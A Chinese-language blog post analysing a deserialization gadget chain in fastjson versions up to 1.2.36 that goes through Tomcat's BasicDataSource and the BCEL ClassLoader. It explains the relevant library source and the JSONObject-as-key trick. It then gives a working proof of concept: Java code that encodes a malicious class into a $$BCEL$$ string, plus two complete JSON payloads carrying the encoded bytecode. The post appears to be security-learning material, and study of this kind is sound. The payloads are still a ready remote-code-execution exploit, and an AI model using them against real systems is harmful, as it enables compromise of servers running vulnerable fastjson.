fastjsonBasicDataSource链分析
(fastjson<=1.2.36)
此利用链只能应用于fastjson<=1.2.36,在1.2.37版本中,直接去掉了key.toString方法。
前置知识:首先我们看一下 com.sun.org.apache.bcel.internal.util;中的ClassLoader.java类,loadclass方法
查看代码
protected Class loadClass(String class_name, boolean resolve)
throws ClassNotFoundException
{
Class cl = null;
/* First try: lookup hash table.
*/
if((cl=(Class)classes.get(class_name)) == null) {
/* Second try: Load system class using system class loader. You better
* don't mess around with them.
*/
for(int i=0; i < ignored_packages.length; i++) {
if(class_name.startsWith(ignored_packages[i])) {
cl = deferTo.loadClass(class_name);
break;
}
}
if(cl == null) {
JavaClass clazz = null;
/* Third try: Special request?
*/
if(class_name.indexOf("$$BCEL$$") >= 0)
clazz = createClass(class_name);
else { // Fourth try: Load classes via repository
if ((clazz = repository.loadClass(class_name)) != null) {
clazz = modifyClass(clazz);
}
else
throw new ClassNotFoundException(class_name);
}
if(clazz != null) {
byte[] bytes = clazz.getBytes();
cl = defineClass(class_name, bytes, 0, bytes.length);
} else // Fourth try: Use default class loader
cl = Class.forName(class_name);
}
if(resolve)
resolveClass(cl);
}其实就是if(class_name.indexOf("$$BCEL$$") >= 0)
clazz = createClass(class_name); 判断传入的class_name是不是这个开头,如果是则会进行decode解码,然后生成字节流:
byte[] bytes = clazz.getBytes();
cl = defineClass(class_name, bytes, 0, bytes.length);
这里获取字节流,然后defineclass就会重新加载这个字节码,最后达成poc链子:BasicDataSource.getConnection() > createDataSource() > createConnectionFactory()
直接看一下createConnectionFactory()中
protected ConnectionFactory createConnectionFactory() throws SQLException {
Class driverFromCCL = null;
String user;
if (this.driverClassName != null) { //如何不是null
try {
try {
if (this.driverClassLoader == null) {//loader也不为null
Class.forName(this.driverClassName);
} else {
Class.forName(this.driverClassName, true, this.driverClassLoader);//查找并加载指定的类
//true是自动调用static方法,然后加载driverclassloader,传参dirverclassname
}
} catch (ClassNotFoundException var6) {
driverFromCCL = Thread.currentThread().getContextClassLoader().loadClass(this.driverClassName);
}
} catch (Throwable var7) {
user = "Cannot load JDBC driver class '" + this.driverClassName + "'";
this.logWriter.println(user);
var7.printStackTrace(this.logWriter);
throw new SQLNestedException(user, var7);
}
}所以我们直接进行加载就可以了,想象很美好但现实是残酷的!!!忘了提了,dirverclassloader 和 driverclassname都有set可以传值
BasicDataSource.getConnection() 这里调用get,返回值继承的不满足条件:
很显然的是getConnection方法是不符合的,返回值类型为Connection。所以正常来说在 FastJson 反序列化的过程中并不会被调用。
有个小trick需要学习,就是如果JSONObject位于JSON的key上的时候:
key = (key == null) ? "null" : key.toString();
这里满足条件会调用key.toString,toJSONString()会调用getter和setter,导致了getConnection()的调用。
key为JSONObject对象,会调用该对象的toString方法。而且JSONObject是Map的子类,当调用toString的时候,会依次调用该类的getter方法获取值。然后会以字符串的形式输出出来。所以会调用到getConnection方法。
package Fastjson;
import com.alibaba.fastjson.JSON;
import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.io.IOException;
public class basicdatasource {
public static void main(String[] args) throws IOException {
//生成我们需要的bcel格式
JavaClass cls = Repository.lookupClass(evil1.class);//将class对象表示java字节码的对象javaclass
String code = Utility.encode(cls.getBytes(),true);//将java字节码对象javaclass转化为JavaClass格式的字节码
System.out.println("$$BCEL$$"+code);//这是前缀要求
String poc="{\n" +
" {\n" +
" \"aaa\": {\n" +
" \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +
" \"driverClassLoader\": {\n" +
" \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
" },\n" +
" \"driverClassName\": \"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AuQ$cbn$daP$Q$3d$X$M6$8e$J$8f$U$f2h$9e$7d$C$L$yu$L$ea$a6J7u$93$wD$e9$fa$fa$e6$8a$5e062$97$88$3f$ea$9a$N$ad$ba$e8$H$f4$a3$aa$ccu$9eRZK$9e$f1$9c$99s$e6$8c$fc$e7$ef$af$df$A$de$e1$8d$L$H$9b$$$b6$b0$ed$60$c7$e4$e76v$5d$U$b0gc$df$c6$BC$b1$afb$a5$df3$e4$5b$ed$L$G$ebCr$v$Z$w$81$8a$e5$c9$7c$S$ca$f4$9c$87$R$n$f5$m$R$3c$ba$e0$a92$f5$zh$e9oj$c6$b0$j$88d$e2_$f2t$y$d30Y$f8$a1$90$91$7f$7c$a5$a2$k$83$d3$X$d1$ed$GF$8cF0$e2W$dc$8fx$3c$f4$8f$XBN$b5Jb$g$x$P4$X$e3$cf$7c$9a$v$93I$Gw$90$ccS$n$3f$w$b3$a9d$e4$ba$86$eb$a1$E$d7$c6$a1$87$p$bc$m$7dr$r$bar$n$3d$bc$c4$x$86$8d$7f$e8$7bx$N$97a$f3$3f$$$Z$aa$P$a4$d3p$q$85f$a8$3d$40g$f3X$ab$J$99p$87R$df$X$8dV$3bx2C$97X$e4E0$bcm$3d$ea$Ot$aa$e2a$ef1$e1K$9a$I9$9b$R$a12$a5$a6$ce$ee$3fO$b9$90t$97M$bf$cd$3c90s$z$c55$aa$7c$ca$8cr$a1$f3$Dl$99$b5$3d$8a$c5$M$cc$a3L$d1$bb$Z$c0$3a$w$94$jT$ef$c9$3c$T$D$ea$3f$91$ab$e7W$b0$be$7e$87$f3$a9$b3Bq$99$e1$r$e2$WH$c5$u6$e9$cb$e8$962$d4$se$H5R$ba$dbP$86Eu$9d$aa$Nzm$e4$C$h$cf$yj42S$cdk$dfl$i$C$80$C$A$A\"\n" +
" }\n" +
" }:\"xxx\"\n" +
"}\n";
JSON.parse(poc);首先在{“@type”: “org.apache.tomcat.dbcp.dbcp2.BasicDataSource”……} 这一整段外面再套一层{},这样的话会把这个整体当做一个JSONObject,会把这个当做key,值为xxx。
String poc="{\n" +
" \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +
" \"driverClassLoader\": {\n" +
" \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
" },\n" +
" \"driverClassName\": \"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AuQ$cbn$daP$Q$3d$X$M6$8e$J$8f$U$f2h$9e$7d$C$L$yu$L$ea$a6J7u$93$wD$e9$fa$fa$e6$8a$5e062$97$88$3f$ea$9a$N$ad$ba$e8$H$f4$a3$aa$ccu$9eRZK$9e$f1$9c$99s$e6$8c$fc$e7$ef$af$df$A$de$e1$8d$L$H$9b$$$b6$b0$ed$60$c7$e4$e76v$5d$U$b0gc$df$c6$BC$b1$afb$a5$df3$e4$5b$ed$L$G$ebCr$v$Z$w$81$8a$e5$c9$7c$S$ca$f4$9c$87$R$n$f5$m$R$3c$ba$e0$a92$f5$zh$e9oj$c6$b0$j$88d$e2_$f2t$y$d30Y$f8$a1$90$91$7f$7c$a5$a2$k$83$d3$X$d1$ed$GF$8cF0$e2W$dc$8fx$3c$f4$8f$XBN$b5Jb$g$x$P4$X$e3$cf$7c$9a$v$93I$Gw$90$ccS$n$3f$w$b3$a9d$e4$ba$86$eb$a1$E$d7$c6$a1$87$p$bc$m$7dr$r$bar$n$3d$bc$c4$x$86$8d$7f$e8$7bx$N$97a$f3$3f$$$Z$aa$P$a4$d3p$q$85f$a8$3d$40g$f3X$ab$J$99p$87R$df$X$8dV$3bx2C$97X$e4E0$bcm$3d$ea$Ot$aa$e2a$ef1$e1K$9a$I9$9b$R$a12$a5$a6$ce$ee$3fO$b9$90t$97M$bf$cd$3c90s$z$c55$aa$7c$ca$8cr$a1$f3$Dl$99$b5$3d$8a$c5$M$cc$a3L$d1$bb$Z$c0$3a$w$94$jT$ef$c9$3c$T$D$ea$3f$91$ab$e7W$b0$be$7e$87$f3$a9$b3Bq$99$e1$r$e2$WH$c5$u6$e9$cb$e8$962$d4$se$H5R$ba$dbP$86Eu$9d$aa$Nzm$e4$C$h$cf$yj42S$cdk$dfl$i$C$80$C$A$A\"\n" +
" }";
JSON.parseObject(poc);
//离谱直接弹出来了,呃呃呃如果目标环境使用的是JSON.parseObject方法,那就不用这么麻烦了,与 parse() 相比,parseObject() 会额外的将 Java 对象转为 JSONObject 对象,即调用 JSON.toJSON(),在处理过程中会调用所有的 setter 和 getter 方法。
先记住日后慢慢理解
参考链接:https://blog.csdn.net/Gamma_lab/article/details/123294137
https://github.com/bfengj/CTF/blob/main/Web/java/fastjson/%5BJava%E5%AE%89%E5%85%A8%5Dfastjson%E5%AD%A6%E4%B9%A0.md
标签:aa,name,链分析,fastjsonBasicDataSource,apache,null,class,3d From: https://www.cnblogs.com/JYcxk/p/17181835.html